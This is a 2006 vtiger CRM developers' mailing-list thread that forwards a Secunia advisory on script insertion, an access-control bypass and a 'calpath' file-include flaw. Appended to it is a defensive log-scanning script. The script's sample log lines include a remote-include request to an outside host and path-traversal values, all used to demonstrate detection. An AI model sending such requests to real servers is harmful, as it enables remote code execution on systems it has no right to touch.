[Vtigercrm-developers] Fwd: [SA21728] vtiger CRM Multiple Vulnerabilities

Kim Haverblad kim at haverblad.se
Thu Oct 12 01:07:01 PDT 2006


Mike,

I see that you have access to the commercial version of the Secunia service,
and that's good, since the change log updates that you get are only sent out
to customers and not to the open list that I'm on.

The change log then says the following, according to your post:

2006-10-11: Updated "Title", "Description", and "Solution" section.
Added additional vulnerability provided by Dedi Dwianto. Updated
"Criticality".

Since the criticality has been updated, I really hope that we see an update
soon - if not, this can only be negative for the vtiger project.

/Kim


Mike O'Loan wrote:
> There's a new highly critical advisory from Secunia about script
> insertion, etc. This seems to be an upgrade of the one posted on Sep 4.
> 
> Mike O'Loan
> 
> ---------- Forwarded message ----------
> From: Secunia <advisories at secunia.com>
> Date: Oct 12, 2006 2:21 AM
> Subject: [SA21728] vtiger CRM Multiple Vulnerabilities
> To: secunia at saucesoft.com
> 
> 
> TITLE:
> vtiger CRM Multiple Vulnerabilities
> 
> SECUNIA ADVISORY ID:
> SA21728
> 
> VERIFY ADVISORY:
> https://ca.secunia.com/?page=viewadvisory&vuln_id=21728
> 
> CRITICAL:
> Highly critical
> 
> IMPACT:
> Security Bypass, Cross Site Scripting, System access
> 
> WHERE:
> From remote
> 
> REVISION:
> 2.0 originally posted 2006-09-04
> 
> SOFTWARE:
> vtiger CRM 4.x
> http://secunia.com/product/6211/
> 
> DESCRIPTION:
> Some vulnerabilities have been discovered in vtiger CRM, which can be
> exploited by malicious people to conduct script insertion attacks,
> bypass certain security restrictions, and to compromise a vulnerable
> system.
> 
> 1) Input passed to the "description" field in various modules when
> e.g. creating a contact and the "solution" field when an
> administrator modifies the solution in the HelpDesk modules isn't
> properly sanitised before being used. This can be exploited to inject
> arbitrary HTML and script code, which will be executed in a user's
> browser session in context of an affected site when the malicious
> user data is viewed.
> 
> 2) An error in the access control verification can be exploited by a
> normal user to access administrative modules (e.g. the settings
> section) by accessing certain URLs directly.
> 
> 3) Input passed to the "calpath" parameter in
> modules/Calendar/admin/update.php is not properly verified before
> being used to include files. This can be exploited to execute
> arbitrary PHP code by including files from local or external
> resources.
> 
> The vulnerabilities have been confirmed in version 4.2.4. Other
> versions may also be affected.
> 
> SOLUTION:
> Edit the source code to ensure that input is properly sanitised and
> verified, and that access to administrative modules is properly
> checked.
> 
> Use another product.
> 
> PROVIDED AND/OR DISCOVERED BY:
> 1,2) Ivan Markovic
> 3) Dedi Dwianto
> 
> CHANGELOG:
> 2006-09-07: Added CVE references.
> 2006-09-18: Added CVE reference.
> 2006-10-11: Updated "Title", "Description", and "Solution" section.
> Added additional vulnerability provided by Dedi Dwianto. Updated
> "Criticality".
> 
> ORIGINAL ADVISORY:
> 1,2) http://www.security-net.biz/adv/D3906a.txt
> 
> 3) http://advisories.echo.or.id/adv/adv54-theday-2006.txt
> 
> ----------------------------------------------------------------------
> 
> Secunia recommends that you verify all advisories you receive by
> clicking the link.
> Secunia NEVER sends attached files with advisories.
> Secunia does not advise people to install third party patches, only
> use those supplied by the vendor.
> 
> Definitions: (Criticality, Where etc.)
> http://secunia.com/about_secunia_advisories/
> 
> 
> 
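A defender-side check for item 3 of the quoted advisory, added here as an example that is not part of this thread or of vtiger's own code: it scans Apache combined-format access log lines (the sample lines below are constructed) for requests to modules/Calendar/admin/update.php whose calpath value points at a remote URL or outside the expected directory. The log format, the classification rules and all addresses are assumptions.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample Apache combined-log lines (not real traffic). The script
# path and the parameter name come from the advisory; every value is made up.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2006:02:30:11 +0000] "GET /vtigercrm/modules/Calendar/admin/update.php?calpath=modules/Calendar/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Oct/2006:02:31:45 +0000] "GET /vtigercrm/modules/Calendar/admin/update.php?calpath=http://203.0.113.7/inc.txt HTTP/1.1" 200 1024 "-" "curl/7.15"
10.0.0.9 - - [12/Oct/2006:02:32:02 +0000] "GET /vtigercrm/modules/Calendar/admin/update.php?calpath=../../../outside HTTP/1.1" 200 1024 "-" "curl/7.15"
10.0.0.9 - - [12/Oct/2006:02:32:30 +0000] "GET /vtigercrm/modules/Calendar/admin/update.php?calpath=%2e%2e/%2e%2e/outside HTTP/1.1" 500 0 "-" "curl/7.15"
10.0.0.7 - - [12/Oct/2006:02:33:10 +0000] "GET /vtigercrm/index.php?module=Contacts&action=index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Script named in the advisory (hypothetical install prefix /vtigercrm is ignored).
VULN_SCRIPT = "modules/Calendar/admin/update.php"


def classify_calpath(value: str) -> Optional[str]:
    """Label a calpath value that should never be used as an include path."""
    v = value.strip().lower()
    if "://" in v:                        # remote include: http://, ftp://, ...
        return "remote-include"
    if ".." in v or v.startswith("/"):    # local include outside the module directory
        return "local-include"
    return None


def scan_log(text: str) -> List[Dict]:
    """Return one finding per request to the vulnerable script with a suspicious calpath."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(VULN_SCRIPT):
            continue
        # parse_qs percent-decodes, so an encoded "%2e%2e" is judged as "..".
        for value in parse_qs(parts.query, keep_blank_values=True).get("calpath", []):
            kind = classify_calpath(value)
            if kind:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"), "kind": kind,
                                 "calpath": value, "status": int(m.group("status"))})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A non-200 status on a flagged request (the fourth sample line) does not mean the attempt failed, only that the included file did not render cleanly, so treat every finding as worth a look.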